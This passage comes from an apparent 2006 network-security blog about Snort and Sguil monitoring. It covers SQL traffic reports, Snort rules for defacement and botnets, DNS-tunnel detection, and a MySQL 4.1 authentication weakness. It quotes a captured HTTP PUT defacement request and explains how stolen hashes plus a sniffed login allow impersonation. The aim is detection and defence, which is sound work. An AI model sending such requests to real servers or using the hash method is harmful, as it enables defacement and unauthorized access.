INET_ATON("192.168.255.255"))
) as test_table
group by dst_port
order by total_bytes desc
limit 5;


The trick here is to do two queries, each limiting itself to either sources on the Internet or sources on my LAN. I can then use the "SELECT" statements to order the columns to reflect the direction of the data flow. In this query, the second column will always be the number of bytes flowing out of my network, and the third column will always be the number of bytes coming into my network. Of course, the first column is the destination port number, which corresponds roughly to the network protocol used.

These two queries are joined by a "UNION ALL" statement to make them into one large result set. The SQL code above treats this as a temporary table, from which the outer SELECT statement grabs it's data and does the final work of summing both incoming and outgoing data flows and creating a neat table.

The output of this query will look something like the following table. Note that I ran it against some very odd sample data, so it doesn't show a full 10 rows. Also, I messed with the numbers because I was uneasy about posting my real data here. Still, you can see what the report looks like.

+----------+---------------+-----------------+-------------+
| dst_port | bytes_to_mynet| bytes_from_mynet| total_bytes |
+----------+---------------+-----------------+-------------+
| 80 | 1816 | 51101804400 | 51101806216 |
| 22 | 1816 | 51101412328 | 51101414144 |
| 443 | 1816 | 51096413496 | 51096415312 |
| 53 | 1804400 | 18093887 | 18274327 |
+----------+---------------+-----------------+-------------+


To use this in your own network, simply change the IP addresses above to represent the beginning and ending of your own address space. As written, the query will track only a single hour of data (from 23:00 to 00:00 of the current day), but you can play with the time specification to get other reporting periods.

Thursday, June 01, 2006

HTTP PUT Defacement Attempts

I've seen the number of website defacement attempts on my network rise by about 3 orders of magnitude since yesterday, as evidenced by this report:


mysql> select date(timestamp) as dt, count(*) from event
where timestamp > "2006-05-30" and signature = "HTTP PUT
Defacement Attempt" group by dt order by dt ASC;
+------------+----------+
| dt | count(*) |
+------------+----------+
| 2006-05-30 | 3 |
| 2006-05-31 | 2006 |
| 2006-06-01 | 1301 |
+------------+----------+
3 rows in set (0.55 sec)

The count for 2006-05-30 is pretty typical (an average day sees less than 10 defacement attempts). Other analysts I've talked with don't seem to be noticing anything unusual. Is it just me?

The reason for this, it turns out, is that I've forgotten to contribute the Snort rule I wrote to detect these attacks. So here it is, in case you're interested in tracking these yourself:

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"HTTP PUT Defacement Attempt";
flow:to_server,established; content:"PUT "; depth:4;
classtype:web-application-attack; sid:1000003; rev:1;)


The attack itself is quite simple. The attackers simple use a built-in HTTP method designed to allow an authorized user to upload a file directly into the web space. It's not even really an exploit, since they're using the PUT method the way it was designed to be used. They're just counting on a misconfiguration that allows anyone to do it.

Here's an example:

PUT /index.html HTTP/1.0
Accept-Language: en-us;q=0.5
Translate: f
Content-Length:153
User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1
Host: education.jlab.org

spykids spykids spykids spykids spykids spykids spykids
spykids spykids spykids spykids spykids spykids spykids
spykids spykids spykids spykids spykid\n\n


As you can see, they're trying to replace the site's default page ("/index.html") with a page consisting entirely of their own text ("spykids" repeated several times).

There seem to be a constant low-level of these attacks on the Internet, and if your servers are configured correctly, you have nothing to worry about. Still, if you're like me, you still want to track these defacement attempts. Using my rule, now you can. I'll be submitting it to the Sourcefire Community Ruleset, so hopefully it'll show up there soon.

Update 2006-06-01 14:37: I'm not the only one who has noticed this anymore. Apparently this group has been defacing a lot of sites lately. Fortunately, I didn't notice it in the quite the way this guy did. I guess they've decided to crank up the defacement machine recently.

Tuesday, May 30, 2006

InfoSeCon 2006 Report

Earlier this month, I was very fortunate to be an invited speaker at InfoSeCon 2006. This was my second year speaking there, and there are two things you should know about this conference:


  1. It's a small conference, because the organizers are have created an atmosphere where the speakers and attendees mingle freely, discuss issues over dinner and drinks, and actually talk rather than just attend presentations. They've built a community, and this works extraordinarily well for both speakers and attendees.
  2. The location is spectacular. Dubrovnik is a UNESCO World Heritage Site for a reason, and it's no joke when they call it the "Pearl of the Adriatic." In fact, the location is so spectacular that the biggest danger is that your boss will want to go instead. Fight this, or you'll miss the spectacular evening events that make this very much resemble a working vacation.

The conference as a mixture of combined sessions and individual "Management" and "Technical" tracks. The speaker list was headed this year by two big names in the industry: Eugene Kaspersky (of Anti-Virus fame) and Marcus Ranum (of "I invented the firewall and we've pretty much all screwed it up since" fame). Mr. Kaspersky's talks were a little light on the technical content, I thought, having been written by his marketing department. Still, it was interesting to hear him speak about the relationship between malware and organized crime. Nothing that isn't already common knowledge, but he's on the cutting-edge of this fight, so just hearing his thoughts was instructive. He also spoke about the organization of his company's malware lab, but I was fairly disappointed with this, as it lacked substantive detail and mostly just emphasized the fact that they do have such a lab.

Marcus Ranum's talks were much more interesting. In fact, he was something of a lightning rod of controversy, as I understand him to be elsewhere, too. He gave a pair of talks, about the state of the security industry and about the evolution of the firewall. The overarching theme, which became a sort of conference catchphrase, was that "we're doing security wrong." Not that anyone has a comprehensive solution yet, but if the first step is admitting that we have a problem, then I think he's done his job. I don't always agree with Marcus, but after hearing him speak and spending some time with him informally, I think his points are valid.

By the way, remember when I said that the organizers try hard to create opportunities to mingle with the speakers? It works. I really appreciated the opportunity to sit down and have several conversations with Marcus. I also got to spend rather a lot of time with some friends, both new and old, in the Croatian, Slovenian and Slovakian IT industry. We prowled the midieval streets of Cavtat looking for vampire photos and listened to a restaurant full of boisterous Croatian tourists singing along with an accordian. We sailed the Adriatic and scaled the Dubrovnik city walls. We even learned a few things about the discipline of Information Security. All in all, a valuable and enjoyable trip, and I can't wait for InfoSeCon 2007!

Friday, May 19, 2006

Scan detection via network session records

I needed a quick, easy way to detect scanners on my LAN. Since I'm running Sguil, I have plenty of data about network sessions in a convenient MySQL database. I thought, why not use that?

My premise (cribbed from Snort's sfPortscan preprocessor) is that network scanning activity stands out due to it's unusually high number of failed connection attempts. In other words, most of the time the services being probed are not available, and this makes the scanner easier to spot. Here is a simple perl script I wrote that implements this type of scan detection by querying Sguil's SANCP session database.

To use it, you'll need to edit the script to modify the $HOME_NET variable. It's a snippet of SQL code, but it's very simple and documented in the comments. I'm looking for scanning activity on my own LAN, so the default is to set it to search only for activity with two local endpoints. If you are reasonably fluent in SQL, though, you can customize this to find other types of scans. There are a few other variables you can tweak (read the comments) but nothing terribly critical.

The script identifies two types of scanning activity. Portsweepers are systems that try a few different ports across a variety of addresses. For example, malware that looks around trying to find open web servers would fall into this category. On the other hand, portscanners are systems that try a lot of ports, usually on a relatively few systems. Attackers that are trying to enumerate services on a subnet would be a good example.

I haven't really tested this anywhere but a RHEL/CentOS 4 system. If you get it working on some other platform, or if you have any other comments/suggestions/improvements, please post them here.

Thursday, May 18, 2006

The value of privacy

In his latest editorial, The Eternal Value of Privacy, Bruce Schneier provides a compelling answer to the question, "If you aren't doing anything wrong, what do you have to hide?"

Schneier's argument is slanted more towards the national security issues of domestic wiretaps, video surveillance and the like, but his points are also valuable from a cybersecurity perspective.

Many of us are tasked with monitoring for abuses of and intrusions into our computing infrastructure. This means collecting and analyzing data, much of which may be considered personal or private. IDS analysts especially may come into contact with the contents of personal communications such as emails, instant messages or even VOIP calls. We may see web URLs, chat room logs or forum postings detailing medical conditions, alternate lifestyles, or even employment concerns. It is our duty (and in many cases, our legal obligation) to protect this information against disclosure, even to others within our own organizations, unless there is a clear security concern which must be acted upon. Even then, discretion and need-to-know are critical.

If you're reading my blog, you're in a group of people who are likely to tackle thorny privacy issues on a regular basis. I highly recommend taking the time to read Schneier's short editorial and think about how this applies to your own situation.

Wednesday, May 03, 2006

A traffic-analysis approach to detecting DNS tunnels

I had the chance to see a very interesting presentation last week about DNS tunnels. I understand the concepts well enough, but I had never run into one "in the wild." I realized, however, that I probably wouldn't have noticed one in the first place, so I decided to try to do a little digging to see if I could come up with a detection mechanism.

Fortunately, I'm using Sguil to collect all my Network Security Monitoring (NSM) data. As you may know, Sguil collects (at least) three types of data:


  1. Snort IDS alerts
  2. Network session data (from SANCP)
  3. Full content packet captures (from a 2nd instance of Snort)

The packet captures are not typically used for alerting purposes, leaving me with the possibility of using either an IDS signature based approach, or something using traffic analysis on the network sessions.

Some DNS tunnel detection signatures already exist (The Sourcefire community ruleset already has signatures to detect the NSTX tunnel software), but I think this approach is doomed to failure from the start. A signature-based approach would be good for detecting specific instances of DNS tunnelling software, but for real protection, a more general detection capability is required. I chose to try the traffic analysis approach instead.

I started with the assumption that there were basically three uses for DNS tunnels, to wit:

  1. Data exfiltration (sending data out of the LAN)
  2. Data infiltration (downloads to the local LAN)
  3. Two-way interactive traffic

Of course, the fourth possibility is that a tunnel could be used for some combination of the above, but I left that out of the scope for now. I also ignored the possibility of two-way traffic for now, since it's harder and I'm just starting to look into this. My main goal was to identify data exfiltration by looking at "lopsided" transfers. By extension, the same technique could also be used to discover data infiltration, as I'll show.

Once I identified the types of tunnels I wanted to detect, I tried to deduce what their traffic profiles would look like. Specifically, I assumed the following:

  1. At least one side of the session would be associated with port 53.
  2. The tunnel could use either TCP or UDP (though UDP is the most likely), but since SANCP is able to construct psuedo-sessions from sessionless UDP traffic, I could effectively ignore the difference between TCP and UDP sessions.
  3. The upload/download ratio would be lopsided. That is, the tunnel client would either be sending more data than they recieve (exfiltration) or vice versa (infiltration).

If you're not familiar with Sguil, just know that all the network session data is stored in a MySQL database. Although you normally access this data through the Sguil GUI, it's also easy to connect with the normal MySQL client application and send arbitrary SQL queries. I
started with this one:

select start_time, end_time, INET_NTOA(src_ip), src_port,
INET_NTOA(dst_ip), dst_port, ip_proto, (src_bytes / dst_bytes) as
ratio from sancp where dst_port = 53 and start_time between
DATE_SUB(CURDATE(), INTERVAL 7 DAY) and CURDATE()
having ratio >= 2 order by ratio DESC LIMIT 25;

The intent of this query is to identify at most 25 DNS sessions during the last week where the initiator (the client) sends at least twice as much data as it receives in response. Sounds good, but it is actually a bit naive. It turns out that many small transactions fit this profile, especially if the DNS server doesn't respond (the response size is 0 bytes).

I fixed this problem by also looking for a minimum number of bytes transferred (in either direction). After all, the purpose of a DNS tunnel is to transfer data, so if there are only a few bytes, the odds are very, very good that it's not a tunnel. In this version, I've set up the query also to check that the total number of source and
destination bytes is at least 50,000:

select start_time, end_time, INET_NTOA(src_ip), src_port,
INET_NTOA(dst_ip), dst_port, ip_proto, (src_bytes + dst_bytes) as
total,
(src_bytes / dst_bytes) as ratio from sancp where dst_port =
53 and start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and
CURDATE() having ratio >= 2 and total > 50000 order by total DESC,
ratio DESC LIMIT 25;

This brings the number of false positives down quite a bit. If this still isn't good enough, you can tune both the ratio and the total bytes to give you whatever level of sensitivity you feel comfortable with. Increasing either number should decrease false positives, but at the expense of creating more false negatives (ie, you might miss some tunnels).

By the way, I mentioned before that you could use the same approach to detect either exfiltration or infiltration. The queries above are written for exfiltration, so if you would like to look for infiltration, simply change the definition of the "ratio" parameter from this:

(src_bytes / dst_bytes) as ratio

to this:

(dst_bytes / src_bytes) as ratio

That'll look for data going in the other direction. The rest of the query is identical for either case.

As I mentioned, I've never encountered a DNS tunnel outside of a lab environment (yet), so I can't say how well my approach holds up in the real world. If anyone with more experience would like to comment, I'm all ears. Similarly, if anyone decides to try out my method, I'd love to hear how it works out for you.

Update 2006-05-04 14:33: My fellow #snort-gui hanger-on and all-around smart guy tranzorp has posted additional analysis of my ideas on his blog. Specifically, he points to two easy ways to evade this simple type of analysis, and I recommend that you read his post for yourself, because he's got a lot of experience with this topic.

If you just want a quick 'bang-it-out-in-an-emergency' check for tunnels, the following updated query isn't bad. It's the same as above, but corrects for the fact that the DNS reply contains a complete copy of the DNS query, as tranzorp pointed out:

select start_time, end_time, INET_NTOA(src_ip), src_port,
INET_NTOA(dst_ip), dst_port, ip_proto,
(src_bytes + (dst_bytes - src_bytes)) as total,
(src_bytes / (dst_bytes - src_bytes)) as ratio
from sancp where dst_port = 53 and
start_time between DATE_SUB(CURDATE(), INTERVAL 7 DAY) and
CURDATE() having ratio >= 2 and total > 50000 order by total DESC,
ratio DESC LIMIT 25;


Based on feedback I've received from tranzorp and others, I'm looking at a more statistical approach to the problem. In short, I'm experimenting with computing a psuedo-bandwidth for each session (bytes sent / session duration), then looking for abnormally high or low bandwidth sessions. I've got a prototype, but it's in perl so it's horribly inefficient for the mountain of DNS session data I collect. I'll post something about it when I have had a chance to tweak on it some more.

Tuesday, May 02, 2006

Unintentionally acknowledging the truth

Here's a funny typo in a recent article about Verizon upgrading the bandwidth on it's fiber-to-the-home service:

The 30-Mbit premium tier was left untouched, in bot performance and price.

Too true, I'm afraid. Too true.

Sunday, April 30, 2006

New HRSUG Website Launched

I'm pleased to announce the grand opening of the new HRSUG website at hrsug.org. The site will carry the latest information about HRSUG meetings and happenings, and separates the information from my personal blog (this one).

I also hope to publish network security-related notes or articles contributed by HRSUG members. If you want blog posting privileges, let me know and I can add you to the list.

Let's keep this announcement short and sweet. Remember, HRSUG is for the members, so let me know if you have ideas for improving the site.

If you read this far, it may also interest you to know that the May HRSUG meeting is coming up this week.

Wednesday, April 19, 2006

EIDE/SATA USB adapter cable, good for forensics?

This product looks like it could really be nice for acquiring images of suspect hard drives.

One interesting feature is that you can connect both the EIDE and the SATA drive at the same time. I guess it could be a bit slow trying to acquire an image when both the source and destination drives are on the same USB port, but on the other hand it's a lot more portable than a full tower rig, so things might balance out.

The obvious problem is the lack of an integrated write-blocker, but I guess you could use your own along with this device.

Anyone tried one yet?

Tuesday, April 04, 2006

April HRSUG Meeting Reminder

Hi, all. I just want to remind everyone that the April meeting of the Hampton Roads Snort Users Group (HRSUG) is coming up:


Date: Thursday, 6 April 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

The topic for the meeting will be "EZ Snort Rules", an introduction to writing basic IDS rules in everyone's favorite pig-themed IDS. See you there!

Update 04/06/06 22:30: I've posted the slides for my presentation on the Vorant downloads page. The full title of the talk is "EZ Snort Rules: Find the Truffles, Leave the Dirt".

Thursday, March 30, 2006

MySQL 4.1.x authentication internals

While reviewing the deployment plans for a new MySQL server yesterday, I started wondering about the security of the authentication protocol it uses. Most of the users of the new database would be accessing it via the LAN, without the benefit of SSL encryption. It's well known that the MySQL 3.x authentication protocol is vulnerable to sniffing attacks, so MySQL 4.1 introduced a new authentication scheme designed to be more secure even over a plaintext session. But was it good enough?

I first spent some time to understand exactly how the protocol works. Thanks to some kind folks in the #mysql channel on irc.freenode.net, I located the MySQL internals documentation page the describes the authentication protocol. Unfortunately, this page doesn't really describe what's going on in the 4.1 protocol, so I turned to the source code for the definitive scoop.

Just so no one else has to do this again, here's a better description of how the protocol works, based on the 5.0.19 release. Look in libmysql/password.c at the scramble() and check_scramble() functions if you want to check the source code for yourself.

The first thing to know is that the MySQL server stores password information in the "Password" field of the "mysql.user" table. This isn't actually the plaintext password; it's a SHA1 hash of a SHA1 hash of the password, like this: SHA1(SHA1(password)).

When a client tries to connect, the server will first generate a random string (the "seed" or "salt", depending on which document you're reading) and send it to the client. More on this later.

Now the client must ask for the user's password and use it to compute two hashes. The first hash is a simple hash of the user's password: SHA1(password). This is referred to in the code as the "stage1_hash". The client re-hashes stage1 to obtain the "stage2_hash": SHA1(stage1_hash). Note that the stage2 hash is the same as the hash the server stored in the database.

Next, the client hashes the combination of the seed and the stage2 hash like so: SHA1(seed + stage2_hash). This temporary result is then XORed with the stage1 hash and transmitted to the server.

Now the server has all the information it needs to know whether the user supplied the correct password. Remember that the server stores the stage2_hash in the database, and it originally created the seed, so it knows both of those. What it wants to recover is the stage1_hash. Fortunately, the data transmitted from the client is simply the seed and the stage2 hash, XORed with the stage1 hash. To recover the stage1 hash, the server simply has to recompute the hash SHA1(seed + stage2_hash), then XOR it with the data provided by the client. The result will be the stage1 hash. Since the stage2_hash is simply SHA1(stage1_hash), the server can simply compute a new stage2_hash and compare it to the hash in the database. If the two hashes match, the user provided the proper password.

Ok, I admit that was probably a little confusing, but here's where I think it gets really interesting. There is a flaw in this protocol. The security depends on keeping two pieces of information a secret from attackers: the stage1 and stage2 hashes. If the attacker knows both hashes, they can construct a login request that will be accepted by the server.

Stage2 hashes are protected by keeping the database files away from prying eyes, but if an attacker were to steal the database backup tapes, for example, the hashes for all database accounts would be in his possession.

Still, just having the stage2 hashes is not enough. The final piece of the client authentication credential is XORed with the stage1 hash, yet the server doesn't know the stage1 hash. Therefore, the protocol provides it with all the information it needs to know in order to derive the stage1 hash. Unfortunately, that means that the same information could be derived by anyone who could sniff a valid authentication transaction off the wire and who also possessed a copy of the stage2 hash.

So the weakness is that if an attacker has the stage2_hash stored in the db, and can observe a single successful authentication transaction, they can recover the stage1_hash for that account. Using both hashes, they can then create their own successful login request, even without knowing the user's actual password.

I've confirmed this with the MySQL team, who say that this is a known issue. It is difficult to exploit, I think, since you need a fair amount of information in order to make the attack successful. Frankly, if you already have the password hashes, you probably also already have the rest of the info in the database as well, so this might be overkill. Still, I had fun working through this last night, so I thought others might enjoy it as well. At the least, maybe I'll save someone else the time I spent understanding how the protocol works.

If this vulnerability really concerns you, you can protect the stage1 hash information by using MySQL's built-in SSL session encryption support. You should probably also be encrypting your backup tapes to protect the stage2 hash and all the data.

Friday, March 17, 2006

Detecting common botnets with Snort

I've been reading up on the mechanics of how popular bot software actually works, with an eye towards detecting it on the wire. I've been using the BLEEDING-EDGE ATTACK RESPONSE IRC - Nick change on non-std port and its cousins, which attempt to detect botnets and other "covert" channels that think they're clever by sending IRC protocol traffic over ports that are not normally associated with IRC. These work well, have two problems:


  1. Some IM programs (like ICQ and MSN Messenger) use the IRC protocol on various ports and thus trigger this rule
  2. The rule doesn't detect botnet traffic if they happen to use the standard IRC port (6667)
One of the papers I've been reading recently was this great overview of four popular bot packages, An Inside Look at Botnets by Paul Barford and Vinod Yegneswaran. This isn't groundbreaking new research by any means, but they have started to put together some basic practical information about how these things work on the wire.

Having read that paper, I decided it would be fun to write a set of Snort rules to detect traffic generated by the four bots they mention. That would at least address the part of the problem #2, so could be a very worthwhile effort as well. Here are the rules, suitable for inclusion in your own local.rules file.

For those who are curious about what these do, there are three functions. The first rule (sid 9000075) attempts to define IRC protocol traffic, no matter what port the server is using. It sets the "is_proto_irc" flowbit on the session, so the later rules can depend on this to be set and won't do a lot of work inspecting non-IRC packets. This rule will never generate any alerts; it's only there to make the other rules in this file more efficient.

The second rule (sid 9000076) isn't necessarily related directly to botnets. It looks for IRC servers that seem to be on your local network and are communicating with outside hosts. If you actually do run a legitimate server, modify or comment this out as appropriate.

All the rest of the rules look for specific commands used by AgoBot/PhatBot, SDBot, SpyBot and GTBot. The GTBot commands are slightly more complex. All the others just use plain words (like "portscan ") for commands, but GTBot uses a command character to distinguish commands from other data (like "!portscan "). Since it seemed to me that the command character was likely to change from botherder to botherder, I coded in a regular expression that tried to allow a variety of possible cmdchars. You'll see those in the rules.

Anyway, feel free to use these rules if you like. I won't guarantee they work well yet, since I haven't been running them long, but so far so good. They probably won't crash your snort process, but that's about all I can say about them. I will give you one note of caution: If you find an active botnet, you may generate a lot of alerts. Consider using thresholding to avoid overwhelming your IDS analyst.

If you actually detect a botnet through these rules, please let me know. As far as I know, I have no active botnets right now, so I've only been able to test them against contrived traffic and not live data. I'd like to know if they do or do not work in the wild.

Update 4/4/2006: These bot rules are now included as part of the snort.org community ruleset. Thanks to Sourcefire's Alex Kirk, who made the rules better by pointing out that I forgot to add the "nocase" directive to make the rules case-insensitive. If you're using my rules, I recommend that you remove them and have a look at the community rules instead.

Tuesday, February 28, 2006

I'm finally caving in...

...and sitting the CISSP exam. I mentioned this to a few people today and got one of two reactions:


  1. They immediately lost all respect for me, or
  2. Ok, I lied. There was only one reaction.

I admit this was based on a rather limited sample, but wow. People really seem to hate the CISSP, all it stands for, it's dog and the horse it rode in on.

I've read some of Richard Bejtlich's thoughts on the matter (which made quite the splash when they were originally published). I agree with him that the ISC(2) code of ethics is pretty much all the CISSP has going for it, but I don't think that explains the vituperousness of the reactions I see whenever CISSP is mentioned. Nor do I necessarily think it's jealousy, because most of the people I get this from could easily pass the exam (if they were willing to pony up the $500 fee).

It seems to me as though I've detected a bit of a pattern, though: the more comfortable a person is working with technical matters, the less likely they are to respect the CISSP. Is it just our geeky tendency to look down upon those things which can be done by any suit and tie lackey? Is the perception that
CISSP == management == PHB? I don't think it's really that simple, but maybe us geeks just need someone to love to hate and Bill Gates wasn't available today.

If anyone has any theories they'd like to share, or if you hate people who hold CISSPs and would be kind enough to let me know why, please leave a comment.

Sunday, February 26, 2006

March HRSUG meeting

Hi, all. I just want to remind everyone that the March meeting of the Hampton Roads Snort Users Group (HRSUG) is coming up:


Date: Wednesday, 8 March 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040


As of this moment, there is no topic assigned to the meeting. I'll work on that, but if anyone has a suggestion or would like to volunteer to talk about something, please let me know.

Friday, February 24, 2006

Weird Cisco attacks happening all over the world

On February 4th, I started seeing small numbers of the following Snort alert:

Cisco IOS HTTP configuration attempt

Here's a breakdown of the number of alerts per day for the first couple of weeks of the month:


| 2006-02-04 | 6 |
| 2006-02-05 | 4 |
| 2006-02-13 | 2 |
| 2006-02-14 | 1 |
| 2006-02-15 | 30 |
| 2006-02-16 | 26 |

There were two things that drew my attention to this activity. First, it's an old exploit (detailed in this advisory. Second, there was a sharp spike in activity starting on the 15th.

Around the same time as I noticed this, the SANS ISC Handler's Diary posted an entry about it, and they didn't know what was going on either. I contacted them about it, and have since heard nothing in reply.

I didn't think too much about this at first, but after collecting a few more days' worth of data, I noticed the following: Each source IP only attacked one destination IP, and while is usually a steady stream of 3 or 4 alerts per hour, there are some periods where I go for several hours without seeing anything. These things tend to suggest that the attacks are coordinated, probably through a single botnet.

Today, I heard from several other analysts around the planet who have seen similar traffic. I got the IPs and timestamps from a few of them and am in the process of analyzing some of the data. What I can see so far is that we've got around 280 individual attacks from ~250 unique IPs. Each of the three sites reporting has at least a few IPs in common with the others, further supporting my idea that this is all due to one big botnet.

I don't have much information yet, but big thanks to fellow #snort-gui regulars David Lowless and hewhodoesnotwishtobenamedbutknowswhoheiseventhoughIrefusetousehiscodenameJesus for providing data and sharing thoughts & ideas about this. It may all just turn out to be nothing, but the coordination and stealth involved make it interesting if nothing else.

Update 2006-02-24 15:53: I asked around on the #shadowserver channel, and have found that attacks like the ones I observed have been found in at least one active botnet (not sure if the scattered sightings are from different botnets or not).

Why they are probing for 5 year old vulnerabilities in Cisco routers is still a mystery. Maybe they just want to use them as proxies for IRC/spam/other attacks. I hope that's the extent of their ambitions.

Update 2006-03-06 11:41: Based on conversations I've had with others who are experiencing these sorts of attacks, I've concluded that the most likely scenario is that the perpetrator is hoping to gain access to Cisco devices in order to use them as IRC proxies to hide their true network address while trading credit card numbers and other illicit info. In other words, they can log on to the devices and initiate outbound network connections to IRC servers. One analyst speculated that there may be an IRC client plugin of some sort to facilitate this, and that seems like a reasonable assumption.

BTW, if this technique is used to disguise IRC, it may also be used to disguise connections to other services as well (HTTP?). This all seems like a pretty roundabout way to achieve the hypothesized goal, but certainly in keeping with technology that existed at the time the original exploit was discovered. Maybe someone is just using some old scripts they found online somewhere?

Update 2006-03-07 06:53: The Philippine Honeynet Project (which I reached via this SANS ISC diary entry) has also noticed these probes. Their analysis includes the name of the tool they believe responsible (ciscoscanner). Unaccountably, though, they're suggesting that the tool is looking for the vulnerability listed in this advisory, which doesn't seem to fit the observed data. It's good to read that some other people have finally noticed this, at least. They kind of stick out like a sore thumb if you're paying attention.

Tuesday, February 14, 2006

Dshield for IDS systems?

Most of us are probably familiar with the Dshield project, which collects firewall logs from users around the planet. They process this data to extract attack trends and produce reports we can use to help evaluate the potential "hostileness" (my term) of a given IP address.

While going through my morning sguil operations, I thought to myself, "Why haven't we done this for IDS events yet?"

My idea is very simple. Sguil requires an analyst to assign each event to a different category (e.g., "successful admin compromise", "attempted compromise", "virus activity", "no action required", etc). For those categories which correspond to confirmed malicious intention, why not collect data about the alerts and forward them to a central clearinghouse?

Of course, you wouldn't want to collect all the data, for privacy reasons. You'd probably only want the attacker's IP, the timestamp and a common reference number to show what event occurred (the snort sid, for example, though that only applies to a single IDS). You could further apply some basic rules to the data before submission, to delete all records originating from your own network, for example.

So what would be some of the benefits of this system? First, the clearinghouse would be in a position to notice hosts which were attacking large segments of the Internet. This determination would be based on confirmed data submitted by human analysts and would therefore be more inherently trustworthy than data garnered from firewall logs. Second, the clearinghouse could directly observe and report on the types of attacks being seen in the wild, something the existing Dshield project cannot do. Finally, this data could be fed back down into the IDS analysis tools to help adjust the severity of observed events based on how similar events were previously categorized by other analysts. Sort of a Cloudmark for IDS.

I'm not suggesting that there's anything wrong with Dshield. They're providing a great service that I rely upon to help me make decisions every day. It's just that they're only capturing one type of data (firewall logs). I think their model could logically be extended to IDS operations, to the benefit of the entire community.

Update 02/14/2006 11:36: Someone on the #dshield IRC channel mentioned that this idea also sounds similar to Shadowserver. True enough, though they're using their own net of mwcollect and Nepenthes collectors to track malware distribution, and so they're not capturing IDS data. Great for tracking automated attacks and generating high-quality blacklists of sites actually distributing malware. Not quite what I had in mind, but also a very valuable dshield-esque service. Check them out, but keep in mind that they haven't gone public with their data yet. If you ask nicely, though, they might give you access to the IRC channel that keeps track of the botnet reports in realtime. I'm going to check it out.

Sguil 0.6.1 released

There's a new Sguil release to start your morning. 0.6.1 features an updated client that's more responsive to large data sets. It also has some major new features, like:


  • The use of UNION in the MySQL queries is now the default. This has led to at least an order of magnitude decrease in the search time in my own (huge) SANCP database.
  • There's a new panel that displays snort statistics for each sensor. This finally allows you a semi-realtime view of packet loss and traffic/session statistics for each sensor.
  • Communication between the sensors and the server can now be encrypted with OpenSSL/TLS, using the same mechanism that protects the traffic between the client and server.
  • Numerous important bug fixes

I've been using the prerelease version of this code for a little while now, and it works a heck of a lot better than 0.6.0p1 did.

One thing that I did notice is that it's not quite a drop-in replacement for the old version. If you are using TclTLS to encrypt client/server communications, you will need to add the "-o" command line flag to your startup script to turn this feature on. In previous versions, specifying the TLS library location with "-O" was enough, but now two subsystems can use the same library (the client and the sensor communication paths) so you have to explicitly tell sguild which one(s) you want to encrypt.

This small caveat aside, if you're using sguil, you probably should upgrade at your earliest convenience.

Wednesday, February 08, 2006

Packet fragmentation issues in the Snort IDS

One of the features that will eventually make it into Snort is a new processor for handling fragmented IP packets (the "frag3 preprocessor"). Sourcefire's Judy Novak has written a paper outlining the challenges to doing proper fragmentation reassembly, entitled Target-Based Fragmentation Reassembly.

It just so happens that Judy is speaking on this topic tonight at our HRSUG meeting, so if you're looking for more information about frag3 issues, now you have the link.

Update 2006-02-14 08:53: As Joel Esler pointed out, I got this whole topic badly wrong. I'm not really sure why, since I'm pretty familiar with frag3 and have been using it for some time. Maybe I was just rushed. Yeah, that's it.

Anyway, the actual topic was the new stream5 TCP stream reassembly preprocessor, and it's application of target-based stream reassembly policies. It was, by the way, and awesome presentation! Thanks, Judy, and come back to see us any time!

Tuesday, February 07, 2006

DDoS bot owner's story

A web server managed by fellow #snort-gui regular Chas Tomlin was recently attacked and turned into a DDoS zombie. Chas wrote up his experience and shows how he used a combination of network (sguil) and host forensics to track down the source of the problem. A good read, and he includes code, too. My favorite part is the IRC log where he secretly captured two of the bot operators chatting about the how they got in.

Monday, February 06, 2006

Disabling IPv6 under Linux

I set up a sguil sensor at home this weekend, and decided to have it monitor outside my firewall, just because I wanted to know what things looked like out there. This was a version of Linux, and I followed the standard host hardening prescription of turning off unecessary services and interfaces. Since I'm not using IPv6, I wanted to turn support for it off entirely.

Being too lazy to compile my own kernel (good bye, easy updates) I wanted to find a good way to disable IPv6 globally. It turns out that the easiest thing to do is to add the following to your /etc/modules.conf file, then reboot.


alias net-pf-10 off

This prevents the kernel from loading the module that supports IPv6 (called, "ipv6"). This is a CentOS 4.2 box, and I could find no easier way of accomplishing the same thing.

February HRSUG Meeting Reminder

Just a reminder that the February meeting of the Hampton Roads Snort Users' Group is this week:


Date: 8 Feb 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

Our guest speaker is Sourcefire's Judy Novak, who will be speaking about target-based fragment reassembly in Snort. Judy's bio and presentation abstract can be found in the original meeting announcement.

Sunday, February 05, 2006

BackTrack Security LiveCD Beta

I don't watch football (Superbowl? What's that?) so while the entire US is shut down to watch an East Coast/West Coast smackdown, of course I'm playing with the new BackTrack LiveCD.

In case you're not familiar with this project, this is the first beta release of the projects formerly known as Auditor and WHAX, merged into a single distribution that looks, on first glance, like a really strong offering.

I never used WHAX, but I have followed Auditor for about a year. It was a really nice collection of pre-installed security tools, mostly hacking and cracking packages like network scanners, vulnerability assessment tools, bluetooth utils, password crackers and the like. Not only did the OS offer reliable hardware autodetection, but the Auditor team went through a lot of trouble to add run-time autoconfiguration to many of the included tools (think: no more editing kismet.conf).

This version of BackTrack will look very familiar to Auditor users. It preserves much of Auditor's look-and-feel, including the task-oriented launch menu that made it so easy to find the right tool for the situation. There are still an awful lot of tools available, though I haven't compared the lists to see which were added or dropped in the conversion to BackTrack.

While the old Auditor releases were monolithic CD images, BackTrack is based on the SLAX Slackware LiveCD, and now offers easy GUI-based ISO customization. This was originially a feature of WHAX/SLAX. This customization feature makes it easy to create a specialized BackTrack ISO for whatever you have in mind.

For example, even though the beta was just released today, I found that there were already three patches available. You read that right: patches for a LiveCD ISO. I downloaded the three module files from the BackTrack website as well as the Windows-based SLAX customization tool, MySLAX Creator. Within about 1 minute, I had remastered the ISO to include the new patches. Sure enough, at boot time it recognized the additional modules and loaded them into the running image.

Although the software on the beta release is not itself modularized, this is planned for the future, giving users the ability to strip out things they won't need. Users can already create additional modules to add to their ISO images, and I may try this with the Sguil and InstantNSM software.

Tomorrow, I hope to find time to play with some of the included tools some more, especially the bluetooth utilities. In the meantime, if you're at all interested in a security tools LiveCD, you really should give BackTrack a try.

Thursday, February 02, 2006

My experience with m0n0wall

